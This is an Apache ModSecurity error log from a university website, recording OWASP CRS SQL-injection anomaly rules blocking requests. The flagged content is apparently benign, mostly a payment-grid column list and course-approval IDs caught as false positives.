[Tue Aug 29 09:40:30.743459 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1ansCo-f0AAPjIfj4AAAAj"]
[Tue Aug 29 09:40:59.878306 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1au8Co-f0AAPlpRg4AAAAS"]
[Tue Aug 29 09:40:59.878419 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1au8Co-f0AAPlpRg4AAAAS"]
[Tue Aug 29 09:41:08.192737 2023] [:error] [pid 63688] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:par_setuju. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within ARGS:par_setuju: 20222x55201x-x41155050160181x15500211012x-x553109x0x0x-xx;20222x55201x-x41155050160181x505212012x-x553109x0x0x-xx;20222x55201x-x41155050160181x505231423x-x553109x0x0x-xx;20222x55201x-x41155050160181x505231431x-x553109x0x0x-xx;20222x55201x-x41155050160181x505232083x-x553109x0x0x-xx;20222x55201x-x41155050160181xTIF21032x-x553109x0x0x-xx;20222x55201x-x41155050160181xTIF21082x-x553109x0x0x-xx;20222x55201x-x41155050160181xTIF2112x-x553109x0x0x-xx;20222x55201x-x411..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_ [hostname "www.unla.ac.id"] [uri "/index.php/e_akademic/c_karturencanastudi/simpansetujusks"] [unique_id "ZO1axMCo-f0AAPjIfkEAAAAj"]
[Tue Aug 29 09:41:28.313029 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a2MCo-f0AAPlpRg8AAAAS"]
[Tue Aug 29 09:41:29.861761 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a2cCo-f0AAPlpRhAAAAAS"]
[Tue Aug 29 09:41:30.046589 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a2sCo-f0AAPlpRhEAAAAS"]
[Tue Aug 29 09:41:30.226515 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a2sCo-f0AAPlpRhIAAAAS"]
[Tue Aug 29 09:41:30.420761 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a2sCo-f0AAPlpRhMAAAAS"]
[Tue Aug 29 09:41:30.605626 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a2sCo-f0AAPlpRhQAAAAS"]
[Tue Aug 29 09:41:30.790333 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a2sCo-f0AAPlpRhUAAAAS"]
[Tue Aug 29 09:41:30.963435 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a2sCo-f0AAPlpRhYAAAAS"]
[Tue Aug 29 09:41:31.318497 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a28Co-f0AAPlpRhcAAAAS"]
[Tue Aug 29 09:41:31.500803 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a28Co-f0AAPlpRhgAAAAS"]
[Tue Aug 29 09:41:31.822677 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a28Co-f0AAPlpRhkAAAAS"]
[Tue Aug 29 09:41:32.014995 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a3MCo-f0AAPlpRhoAAAAS"]
[Tue Aug 29 09:41:32.215633 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a3MCo-f0AAPlpRhsAAAAS"]
[Tue Aug 29 09:41:32.542293 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a3MCo-f0AAPlpRhwAAAAS"]
[Tue Aug 29 09:41:32.714540 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a3MCo-f0AAPlpRh0AAAAS"]
[Tue Aug 29 09:41:32.926213 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a3MCo-f0AAPlpRh4AAAAS"]
[Tue Aug 29 09:41:33.238087 2023] [:error] [pid 63849] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1a3cCo-f0AAPlpRh8AAAAS"]
